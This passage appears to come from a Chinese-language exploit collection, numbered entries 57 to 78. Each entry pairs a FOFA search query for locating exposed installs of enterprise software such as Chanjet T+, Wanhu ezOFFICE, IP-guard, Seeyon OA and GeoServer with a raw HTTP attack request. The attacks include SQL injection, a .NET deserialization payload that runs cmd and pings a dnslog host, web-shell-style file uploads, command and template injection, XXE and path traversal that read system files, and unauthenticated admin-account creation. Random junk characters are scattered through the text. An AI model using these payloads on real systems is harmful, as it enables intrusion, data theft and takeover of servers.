POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.12 O* H. O( v7 {# g9 ?6 h
Host: x.x.x.x1 m2 m& J9 p% K5 o Q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
! B h3 \. r M. a+ G3 NContent-Type: application/json
- F: R4 d1 W" H& s) k: \9 w0 b7 ?4 D: ?2 T. N" v
{1 K& j3 [6 }- X9 I( Z s1 d$ |
"storeID":{1 r0 d$ D+ O" q8 Q* `$ u: Q
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",2 g% m6 ^7 q: f* f" L
"MethodName":"Start",& D% e& W" A- p+ s1 Y
"ObjectInstance":{
z) b! D8 V, M% a4 z "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",: q6 @( A. i. s7 ~# b3 ~
"StartInfo": {+ x! ~; x; K$ m/ E% [% [* _
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
! E; d0 l1 y! G8 J, D "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
8 J( A( [" g' c$ T }0 A6 P& z: v$ N7 r. z
}
& P8 ?% D8 ^' y }) S: H1 d( C: |: Y
}
% e4 e$ K3 {6 I# }) q, B
/ B( n4 N6 t1 c1 o9 f. i6 I2 X0 y0 M
57. 畅捷通T+ keyEdit.aspx SQL注入( p9 h+ C0 u9 \: E/ O+ r9 M5 o
FOFA:app="畅捷通-TPlus") d- _; O' ^; ~
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.10 p8 }4 V4 n( }. z
Host: host8 J: a. e: f( m- _' j h
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
( ~0 s% W2 o, z' ^5 d B7 O' VAccept-Charset: utf-88 g9 a x y! B6 a2 o# b) l8 Q
Accept-Encoding: gzip, deflate. @( M2 W4 I& w: z; M2 c+ y {
Connection: close2 X) X& }! R H
- _3 u8 W! r7 D
% I/ e5 q; ?# O' w) g7 X {' @58. 畅捷通T+ KeyInfoList.aspx sql注入4 q* M* ]+ R5 f: L8 t {" @
FOFA:app="畅捷通-TPlus"' f |* P! D% m/ l' V! {
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
9 ]" z4 j& \- wHost: your-ip
+ v, u( J; _9 L( \# m# y" M' W DUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.363 Q: h7 L: ^# s! G6 h9 ^- }
Accept-Charset: utf-8) p3 b; L" `. ?! D+ p
Accept-Encoding: gzip, deflate
5 W% Y# }4 j. W$ a! s1 {3 B6 OConnection: close3 E+ a' a5 y( J) [' v1 V
/ q$ x0 Y. E! A' X. ]" p9 b5 N6 ~4 Q5 |( K
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
' S3 \, F- K0 W6 Y: AFOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
6 Y; ~. r2 [8 FPOST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
5 l5 Q5 b7 O7 h0 P6 v+ [8 kHost: 192.168.86.128:9090
8 [4 {6 ?! N; W4 MUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
# F$ L0 O4 @$ ?% d0 w+ x1 JConnection: close; ^9 D" j- @( X6 k4 @/ S: S- i
Content-Length: 1669( x) p6 t( X8 }. }2 ~, x/ Q
Accept: */*) E0 I5 o6 r" X5 A0 F
Accept-Language: en$ d* n+ l* g* M9 k* F- Z; h1 K
Content-Type: application/x-www-form-urlencoded
6 M! g6 K1 l) f" d [' d4 x7 p. mAccept-Encoding: gzip# [8 k6 Y$ @7 o7 K
$ z3 { A2 k v6 M3 e qPAYLOAD
: t2 j: n a+ }4 {3 a3 I3 z( _9 r/ v# T. c
0 R4 H/ | @8 A
60. 百卓Smart管理平台 importexport.php SQL注入( ]0 @+ q7 l3 J/ q( H
FOFA:title="Smart管理平台"2 n: c5 a+ P, U. O
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
% M- q/ Q7 a) \* `: Z# dHost:! ~, X6 U1 R7 A! N8 t! |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.368 T! q5 [+ y; ~. L
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
8 g1 g- o/ f: W( h* FAccept-Encoding: gzip, deflate+ r3 j( {8 o0 Y3 ]0 c0 ?0 l
Accept-Language: zh-CN,zh;q=0.9
& U* V" \. X8 O7 ^+ PConnection: close* L- ~2 c6 T# d& [, G6 ~
+ Q, ]; i+ D- K4 k6 E$ p
. p% g* q* N/ ~6 P! A# T/ p61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
# `4 ^) m5 J PFOFA: title="欢迎使用浙大恩特客户资源管理系统"' S$ o9 n# D9 O) W5 x
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.16 ^8 R, u) l1 G; O' E) M/ u) G7 f
Host: x.x.x.x2 r; r% B9 e7 H4 g, c2 G
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15( @: t/ M& N# g: f+ b" C
Connection: close
4 o9 N0 d; M% h0 b* p4 E( nContent-Length: 27 B7 Y+ J( d3 h g2 H
Accept: */*
2 a2 J% m1 f7 v( P, qAccept-Encoding: gzip, deflate) u- Z2 F( N/ D$ e" h( `* Y; N& ~
Accept-Language: en4 u' P3 Q9 ^; B8 U- Y$ \
Content-Type: application/x-www-form-urlencoded# e [5 M; Y, e2 R$ e. I! y/ D4 U& c" j
' N* d# `% `9 _* m0 j9 p
8uxssX66eqrqtKObcVa0kid98xa
: F- d. I7 g' ~
; E& Y3 Y3 B- t; P% P
$ M8 r: G8 }' {3 t+ \" U62. IP-guard WebServer 远程命令执行0 s: ]( r+ \( o! M. ], [6 j; W' w" u
FOFA:"IP-guard" && icon_hash="2030860561"" i$ z+ b. C0 A6 V: R7 s
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1' H q) k' w$ r
Host: x.x.x.x
& |, y; d7 J; Z, n: ]& y' R/ [6 ^User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36% s: i1 g; B: B& ^
Connection: close( j: J6 K3 }, q& w, J5 d
Accept: */*
& T1 I7 n! [0 J- ZAccept-Language: en
! m& E6 ~3 F+ t/ X h3 {1 c- qAccept-Encoding: gzip9 k5 m- A3 d6 G) }6 I7 x$ x
) m: x4 s3 E6 J: q' F5 o# }
" ? K- {, U# c- Z
访问
0 r c' F0 }' H6 @6 [) U! `0 e' ?$ m+ e7 C, ~: D E( t
GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
9 O8 y% R) b! C. U6 l ZHost: x.x.x.x
2 O3 {) p% d& e: j
& O$ Z" t- i" k) @0 b
" x9 q1 Y/ H2 U3 }9 S8 O63. IP-guard WebServer任意文件读取2 o% a* ]6 A* H: Y! q
IP-guard < 4.82.0609.0
: H4 i8 X& z2 }7 P. ^FOFA:icon_hash="2030860561"
4 t; p4 j: T+ v2 SPOST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1) k2 S6 S, L2 W# L) x. K; S
Host: your-ip# K* b2 r- x) Z7 I! Q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
* P+ c, x5 x# ^7 `+ R9 _ f3 w0 X" ZAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
, I% j" l8 @: ?9 A' QAccept-Encoding: gzip, deflate5 \# T6 ?; N5 I) P+ {/ T$ n/ F: Y4 @
Accept-Language: zh-CN,zh;q=0.9. S3 ? Q5 C# U. m: k
Connection: close
/ @, j+ C- B, LContent-Type: application/x-www-form-urlencoded
7 U. e" D; C$ j7 O8 g( {- \
! h/ u) X' H/ H' @path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A
# |, ^0 r5 `# H7 r7 V+ f
5 s$ t) {* q( e9 }" v3 k" i, J D0 w64. 捷诚管理信息系统CWSFinanceCommon SQL注入
: w5 {2 b7 Y+ [; I6 ?FOFA:body="/Scripts/EnjoyMsg.js"1 {0 v5 h& r A$ r0 {+ t+ O+ z5 K) i
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1. }( i3 e. A- g9 Q- A) ^8 T# i+ H, Z% C
Host: 192.168.86.128:9001" w6 m; y3 e) j- U7 E1 z
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
, G: Q; V. c$ s2 }Connection: close, q, O' j2 o# q$ ?7 u" P$ `9 ^: K
Content-Length: 369* ]& y! X1 K9 f- I/ n- V |
Accept: */*
/ H) ]; P* A2 e% p, mAccept-Language: en
4 C* G0 e2 ~9 YContent-Type: text/xml; charset=utf-8
2 N; `& H) T) E$ _) z0 d: t) I& c( l8 BAccept-Encoding: gzip
/ A8 K3 u/ H, R/ o6 r& c
4 X% @+ i- P, f, p: P- d<?xml version="1.0" encoding="utf-8"?>
9 I8 ^8 B9 P4 z$ @* o5 v<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">9 |' U* ^, \: K: s& T3 L
<soap:Body>+ c. a. y5 j, `) u+ M5 u* Z, j. |
<GetOSpById xmlns="http://tempuri.org/">
2 q+ t1 W" Q, u9 e* e: G0 O3 ?: A4 ` <sId>1';waitfor delay '0:0:5'--+</sId>
0 A8 ^' q# l9 m( M) }3 f </GetOSpById>/ m) G; m$ w7 D' p
</soap:Body>: V! Y' k7 L E
</soap:Envelope>
2 w8 }: J0 O) v* l, ^# H7 }7 @' k
A% K6 J: G' ]$ k& n" O* q) b- S& r+ g6 b
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
4 w! D3 `' }# @+ v& ^( P2 BFOFA:title="欢迎使用脸爱云 一脸通智慧管理平台" H7 h2 k8 k) \" [
响应200即成功创建账号test123456/123456
1 X$ c. S# W% \9 y7 J$ cPOST /SystemMng.ashx HTTP/1.1( j/ b# m/ a6 ]" Y6 k7 s3 Z
Host:
- a+ Z' q: K4 F( t' w; L5 cUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
0 h* U3 c) ]$ S% FAccept-Encoding: gzip, deflate
+ n) G& T( T2 R0 c; s7 y. X# x4 [! YAccept: */*: r3 \& U, \6 U5 L
Connection: close6 ~# _, `: c* J+ b
Accept-Language: en
# f; `3 U1 A ?) w+ `Content-Length: 174
\8 P; ` F: \$ s. R! x; ?
/ u5 t* [2 T# r/ f9 U# HoperatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators$ D# K' O% D$ s$ c/ ^) c! w) n
1 {; z. R- { Q# w/ q9 W1 g( f; y
6 \' E; h! y' W
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
! `, q, B5 q" v9 Y, rFOFA:app="万户ezOFFICE协同管理平台"
9 a' } U; Y, Y7 I
2 P$ D) P6 A& bGET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
( u& T5 L+ x# A; y4 m" r0 ^! A* @Host: x.x.x.x
- @& J. s+ j" M0 s5 R. c; CUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
& e# a6 S6 y& K5 Q2 jConnection: close
$ @6 K1 I$ t/ o2 i( C4 J I0 ^Accept: */* z$ y/ H+ s# c6 t2 @
Accept-Language: en
! F- k9 o& r7 Q! A" f7 I0 VAccept-Encoding: gzip, V- I* C' i ^7 ~& |, S& Y$ y1 o, p
$ M1 @0 m6 k8 h) \# z. f# s
: ~& @/ q- b Z+ f+ G
第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在
! C9 D+ }2 I1 V6 T8 n( v5 j! \9 S( y/ E/ t; ]1 O4 i
67. 万户ezOFFICE wpsservlet任意文件上传
6 F% e" E0 K& y9 M" }# `0 t6 X; D4 HFOFA:app="万户网络-ezOFFICE"
$ I' g+ w7 D bnewdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型 D# @" p9 ^6 y) f
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1; u4 d8 l: P3 c7 t
Host: x.x.x.x
6 L# d$ I( T2 _& }+ lUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
7 b! n8 w$ n6 H3 ?Content-Length: 173
w8 H0 Y" w, b, f" N) QAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
1 s( b9 Y+ U4 |/ A6 o7 p8 CAccept-Encoding: gzip, deflate
6 h0 q1 k: ^/ K, T5 q; eAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.34 w* q8 S d8 H, s- b8 v
Connection: close
% F1 m& g7 Z, v. S9 JContent-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp! }- h7 Z+ D o
DNT: 1
: O! `. T/ }$ Q3 i) mUpgrade-Insecure-Requests: 10 m+ X" y3 a [" s/ q
8 F1 V2 I! ^+ e, Q1 N
--ufuadpxathqvxfqnuyuqaozvseiueerp8 q( N4 E# _! k2 g# Q
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"
' \8 X. ~9 T r/ `' g% T1 V( @$ p4 P
) H1 y4 |# }. Z8 T/ k, C# P<% out.print("sasdfghjkj");%>$ j7 r) @3 W0 `% H, k, p
--ufuadpxathqvxfqnuyuqaozvseiueerp--+ ` g: A. |# K6 S8 `4 u* U
4 x- w1 u. ?( R* w7 Y+ l5 } f: l
; _$ L1 h1 h) ]
文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp
4 S3 J" q# D; T2 Y. _( q0 P% I' _+ a3 L! B
68. 万户ezOFFICE wf_printnum.jsp SQL注入3 M* t/ h, z0 Z! A
FOFA:app="万户ezOFFICE协同管理平台"6 u5 I" b9 z: P& N7 E# P9 w
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1* _4 [! V, u$ S# p' t4 H" z0 I: c
Host: {{host}}8 u$ P6 O, j- W7 b
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36% U& L. k2 M" Z/ J6 n5 {
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
! s m4 {; F4 g+ y! n" ]8 u. vAccept-Encoding: gzip, deflate7 Q0 |' m' }# i1 e
Accept-Language: zh-CN,zh;q=0.9
, e+ I8 S; d* V7 V8 _Connection: close& d& u& f; ]" x* | `
% E9 A, A0 m* I1 F/ W
) ?2 ?3 t' y$ R) V; A' T+ I. d69. 万户 ezOFFICE contract_gd.jsp SQL注入
- J& Y4 W! Z, }& e. t2 B# ]) B* M, \0 uFOFA:app="万户ezOFFICE协同管理平台"
7 ~3 L- G9 K5 A( S9 mGET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.10 D6 X# m* C3 \; B7 x
Host: your-ip
* H) u' ~9 P$ `1 u% d5 }User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
$ {: Z( I7 ]! G( {3 D: mAccept-Encoding: gzip, deflate
9 l7 v+ o0 e% T+ w0 l3 q, @6 R# `Accept: */*
0 j7 w2 N) f3 d b1 h) iConnection: keep-alive
) `8 L8 \7 {0 \- Q4 L
' i1 C& X; a; W+ z" @
. G$ {3 g" x& f- `8 l4 m70. 万户ezEIP success 命令执行$ m! h1 Y; h$ w
FOFA:app="万户网络-ezEIP"
2 L6 t- A; \* k. m/ f% h1 ^2 v/ qPOST /member/success.aspx HTTP/1.1
- B1 { h+ R H3 xHost: {{Hostname}}
% v7 j9 C# Q0 C0 H! m' G7 g; T- WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
3 T: S# a7 z w' |SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
" h( @6 ]/ |, \" U& iContent-Type: application/x-www-form-urlencoded
% g, s2 |/ ^; W0 F0 N6 K [TYPE: C
( P$ O+ p& s" e) L/ v1 Y* m2 _& ]Content-Length: 16702' E: A- a r1 O- |; m
! L2 \- [* b: {) k# t l9 q9 b__VIEWSTATE=PAYLOAD
: F" [+ I# C2 M; ~1 t, x' ]. Y' y/ W* ]$ z! r' v
2 ]0 B3 e: {$ K7 S7 C& \
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
/ S$ P3 B4 _# M! q* I6 U: ^FOFA:body="PM2项目管理系统BS版增强工具.zip"
1 ^# w4 z) M4 Y8 O: X: AGET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
7 Y9 q5 T! r$ M n& C0 ?Host: x.x.x.xx.x.x.x
U/ `! z8 V7 T! p0 }9 Y+ rUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36. b9 W8 W) e4 L- p8 p
Connection: close3 Y) k& E# x) ~- N
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8* j" Y; a: F) z* [
Accept-Encoding: gzip, deflate& z& f8 L u: z8 ~5 p
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2! Q' Q. U: i" k3 x, ~' W: {! Q2 h/ i
Upgrade-Insecure-Requests: 1
( t6 N7 Y( y9 X5 g) J' U
; M- M- t& |/ J; F- N. [, q" j/ [, O: [: X
72. 致远OA getAjaxDataServlet XXE
; a* d% C5 _8 TFOFA:app="致远互联-OA"" @$ `+ E% C6 T! d& z( L
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
! w" K4 r, V2 ]% N. V @# `: SHost: 192.168.40.131:8099
6 u2 p0 c6 b, d7 e$ U+ h- h( LUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36) w2 c" f/ {# a
Connection: close
: [4 k* d d" V5 vContent-Length: 583* p1 m+ r1 m3 Q* m" [) ~4 h, {
Content-Type: application/x-www-form-urlencoded$ e: i" c* ~) v2 ] g
Accept-Encoding: gzip0 s5 ^6 e2 M6 e v
2 e0 Z' s8 Y) y0 ^
S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E
& c$ M( k& J% A" z
% |- K) s% F2 d: }: t/ b# M& I
73. GeoServer wms远程代码执行
; w; M& \: Q3 S: MFOFA:icon_hash=”97540678”
8 S" S' j+ M5 h, z/ V4 e0 bPOST /geoserver/wms HTTP/1.18 x* c! _# ~" F Y- j7 z. w; L1 M
Host:8 o' E0 c* N4 {% e& V3 A
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
. N- `$ p3 G5 B" B) cContent-Length: 1981
0 G# w4 Q5 g% FAccept-Encoding: gzip, deflate4 X6 u& h0 T& v6 u. y
Connection: close
T4 J- c# G p) v# ^Content-Type: application/xml6 D0 J% C/ a4 \
SL-CE-SUID: 3
# {% p; p0 [' g/ Z, N) ~1 q X6 l" _, k( `% @
PAYLOAD
# B+ E( n; z4 B0 w i9 x: V3 d3 R6 w$ Q% A* X' R2 y6 v! ~& o
2 {8 ~4 ]; d1 L7 j74. 致远M3-server 6_1sp1 反序列化RCE6 U/ ^+ {* j5 Q" u
FOFA:title="M3-Server"* L/ Z! D: p& r# F
PAYLOAD
" k- s" t) e" I3 d) p( w( }/ f
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
! y$ t- [0 u$ F$ |* AFOFA:app="TELESQUARE-TLR-2005KSH"3 v2 G8 _- `* y9 h
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
; v8 g4 C$ u k" L( j" V$ QHost: x.x.x.x8 f+ Q& F _- r9 a0 b
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
/ }9 @8 Z. w3 ~7 r, uConnection: close
4 G6 \- D- n& y$ ~# a7 x0 aAccept: */*8 [& W0 t8 d: a' @
Accept-Language: en
- g, w# K5 _% {4 g* ^4 I( ^: m: E8 BAccept-Encoding: gzip7 \ I/ N) `: [! W* V) }9 B7 k
6 _' T/ M8 }( W
. c" f7 m- I. D4 y5 I m+ OGET /cgi-bin/test28256.txt HTTP/1.1
. @! @$ j6 T% f( ?1 {1 vHost: x.x.x.x
0 j y- ^, i/ I5 J
2 `+ i9 M9 Q0 q- |4 N2 |( _& I- r( U! w3 N4 S5 H
76. 新开普掌上校园服务管理平台service.action远程命令执行
+ C; ]( d& R/ o+ R; h3 tFOFA:title="掌上校园服务管理平台"- O, M$ z) P1 c, [( d
POST /service_transport/service.action HTTP/1.1
. n! G0 ^$ n! Q7 y0 S: d8 XHost: x.x.x.x
5 M1 `5 Q7 R5 r# E* dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
a+ T6 m$ ~! n4 Q. J2 q- e3 PConnection: close q4 ?+ V/ W. ~
Content-Length: 2114 J# r& ^5 u8 E$ K8 i3 X1 H
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
. K: Z; v- }3 BAccept-Encoding: gzip, deflate. A9 x6 V( A% w
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.22 P q0 ~: z( e+ S) q# a- |
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A43 j4 ]$ s* e; E' B7 e7 A3 E( d* a' r/ r
Upgrade-Insecure-Requests: 19 n: m% m, _4 ?2 b% O" V1 H' c4 {$ \
8 A4 ~) R, }; w, N; j% i
{) @1 S+ T5 S2 Z9 i- P- s# X
"command": "GetFZinfo",0 \, k( L5 @! a3 @+ y
"UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"3 [7 u. _6 a1 B4 U
?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}": T' G q' I+ c4 c& t, H" x
}# z1 b/ L# N! Y2 h# W2 t/ H, \
3 ~3 x- x+ P0 G- E! x" L
( F5 I$ w: V1 ?6 n9 p( RGET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
( V1 e0 J# ]. S2 V7 BHost: x.x.x.x
6 Z. i3 y3 g$ f- Z1 g, A- c; t/ n* K5 n8 ~: t
8 O4 [' r0 v2 a
9 l. V+ N6 C7 t1 c, V; M' \
77. F22服装管理软件系统UploadHandler.ashx任意文件上传
: J& r1 ?+ [/ g J. y6 GFOFA:body="F22WEB登陆"3 L5 K/ A) X2 h8 ~9 z0 H
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1( n& j$ d4 |' R3 V3 E. F @! a
Host: x.x.x.x
3 n3 {; D5 \. L5 K, X2 NUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
9 Z% V# F5 y* u8 Y$ fConnection: close
a" D U1 z% c& m+ e. ~/ QContent-Length: 433
" P' q N/ w( d% R6 g5 n0 ]+ m& Z/ gAccept: */*
& L s. ]( f$ R& o% R- D! a. K7 EAccept-Encoding: gzip, deflate
' N! Y) p& e# d+ k4 o1 oAccept-Language: zh-CN,zh;q=0.9
8 Y! {4 S7 x+ G" m8 o# jContent-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix: L' b% b- G# M
$ k8 v; Q5 ^4 |
------------398jnjVTTlDVXHlE7yYnfwBoix0 q" [, D5 ]: K2 f8 ^3 k' w
Content-Disposition: form-data; name="folder"
, V' g) U: t4 ]( U" ^& Y
' C# T P. |7 u& j- E% \/upload/udplog. ?: D" H5 F# F4 c: y p* W
------------398jnjVTTlDVXHlE7yYnfwBoix
9 V1 o" k0 [) hContent-Disposition: form-data; name="Filedata"; filename="1.aspx"# {( c8 q. i# r) N% g6 ~
Content-Type: application/octet-stream
- Z8 x7 t5 U) E2 I$ c/ c. p; b/ ?
hello1234567
7 t0 j4 R7 f* f: E+ ^) O7 d: Y------------398jnjVTTlDVXHlE7yYnfwBoix3 u2 b/ D0 m* g' ]; u3 ?
Content-Disposition: form-data; name="Upload"
+ Y) j+ w5 K/ a* r+ j2 h" |* E, D: u% d& R
Submit Query/ y: P( s) [, c& P
------------398jnjVTTlDVXHlE7yYnfwBoix--" ? Q$ i6 o8 x: ^5 u9 b4 y* e
3 j B5 w' N5 v* A9 `1 m( {* h
* o+ y, N2 M( V K% V C78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
3 I! x- J' t& D5 `. z, k, x8 `2 WFOFA:icon_hash="2001627082". M5 w7 |- P( I7 D$ V; k- O
POST /Platform/System/FileUpload.ashx HTTP/1.15 g0 v) `; r% M8 v/ V
Host: x.x.x.x8 r& t; @2 b" P M
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.157 ?4 h) u& k, J+ w* q1 K
Connection: close
4 O) U* o0 i; U7 i1 I; X0 E( \Content-Length: 336! z$ q: t' I j- S
Accept-Encoding: gzip
2 u0 ~, m' M( m( p9 r; a+ vContent-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l
6 h3 |$ R* W5 }
2 j/ u! q6 I+ M) E" j# O- w------YsOxWxSvj1KyZow1PTsh98fdu6l
& j$ |! R6 |% E" sContent-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"! h/ m) J8 T3 ?0 Z0 A/ N: _
Content-Type: image/png1 g# W) v" M1 P, ^6 x* m, D
